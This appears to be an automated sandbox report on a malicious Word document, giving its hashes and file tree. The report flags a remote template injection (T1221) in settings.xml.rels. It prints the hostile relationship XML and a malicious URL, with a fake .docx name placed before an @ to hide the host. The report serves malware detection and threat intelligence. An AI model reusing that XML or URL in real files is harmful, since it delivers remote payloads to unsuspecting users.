Malicious

943dd6fc2c077ea190b41e0285fec39f

MS Word Document | MD5: 943dd6fc2c077ea190b41e0285fec39f | Size: 60.24 KB | application/msword

Office Document
Remote Template Injection
T1221
Moderately Suspicious Document

Characteristics
MD5: 943dd6fc2c077ea190b41e0285fec39f
SHA1: 93c5495798845bc1eea76f1ce049772d3679abdf
SHA256: ebc21453a68e17f5c0620cfe2fdfd64097f78bdf165cb43d3c19bc15bd2d81e4
SHA384: 3bc87cf0dcbee2c8942df68345bf883355cfe648ee2ae64c2a8e7a888fb5d440af509529878310f3a4bd236669eb8578
SHA512: 91fcb0e1b49dc708b14067ff558321ec5a0e803dab5391f8eaa9bcd22085c86dbcd55fe163b4bad2b00a1dd758e6943476b32716250d4164c43a8e9d7f22d2e4
SSDeep: 1536:kohgS4UkbPVhPwTmSypz4C1nYLOijq7xzLvG9KNrwgQyD2zeO9x:kbSGbTwXyN4Qn6PMzzGKMqXex
TLSH: 4A43F169A2A104BAF502627757813268F72F75C7A213B70325326B6DCFF74C59AE420D
File Structure
943dd6fc2c077ea190b41e0285fec39f (Office Document) [Remote Template Injection, T1221, Moderately Suspicious Document, Malicious]
  [Content_Types].xml (Xml)
  _rels
    .rels (Xml)
  word [Malicious]
    _rels [Malicious]
      document.xml.rels (Xml)
      header2.xml.rels (Xml)
      footer2.xml.rels (Xml)
      settings.xml.rels (Xml) [Remote Template Injection, T1221, Moderately Suspicious Document, Malicious]
    document.xml (Xml)
    footnotes.xml (Xml)
    footer2.xml (Xml)
    footer3.xml (Xml)
    header3.xml (Xml)
    endnotes.xml (Xml)
    header2.xml (Xml)
    media
      image1.emf
      image2.emf
    embeddings
      Microsoft_Office_Excel_Worksheet1.xlsx (Office Document)
        [Content_Types].xml (Xml)
        _rels
          .rels (Xml)
        xl
          _rels
            workbook.xml.rels (Xml)
          workbook.xml (Xml)
          sharedStrings.xml (Xml)
          worksheets
            _rels
              sheet1.xml.rels (Xml)
            sheet1.xml (Xml)
          theme
            theme1.xml (Xml)
          styles.xml (Xml)
          printerSettings
            printerSettings1.bin
        customXml
          itemProps2.xml (Xml)
          _rels
            item3.xml.rels (Xml)
            item2.xml.rels (Xml)
            item1.xml.rels (Xml)
          item1.xml (Xml)
          itemProps1.xml (Xml)
          itemProps3.xml (Xml)
          item3.xml (Xml)
          item2.xml (Xml)
        docProps
          thumbnail.wmf
          core.xml (Xml)
          app.xml (Xml)
          custom.xml (Xml)
      Microsoft_Office_Excel_Worksheet2.xlsx (Office Document)
        [Content_Types].xml (Xml)
        xl
          _rels
            workbook.xml.rels (Xml)
          workbook.xml (Xml)
          styles.xml (Xml)
          worksheets
            sheet2.xml (Xml)
            sheet1.xml (Xml)
          theme
            theme1.xml (Xml)
          sharedStrings.xml (Xml)
          printerSettings
            printerSettings1.bin
        docProps
          thumbnail.wmf
          core.xml (Xml)
          app.xml (Xml)
          custom.xml (Xml)
    theme
      theme1.xml (Xml)
    settings.xml (Xml)
    styles.xml (Xml)
    webSettings.xml (Xml)
    fontTable.xml (Xml)
  docProps
    app.xml (Xml)
    core.xml (Xml)
Malware Configuration - Remote Template
Target: https://goodthingswithbestfeaturesnearlyneedforbestconfigurationfornetiretimewithme.docx@bersatu.me/LzvSc4
Path: settings.xml.rels
XPath: /Relationships/Relationship
Outer XML: <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="https://goodthingswithbestfeaturesnearlyneedforbestconfigurationfornetiretimewithme.docx@bersatu.me/LzvSc4" TargetMode="External" xmlns="http://schemas.openxmlformats.org/package/2006/relationships" />

Artefacts
Remote Template - Highly Suspicious: https://goodthingswithbestfeaturesnearlyneedforbestconfigurationfornetiretimewithme.docx@bersatu.me/LzvSc4
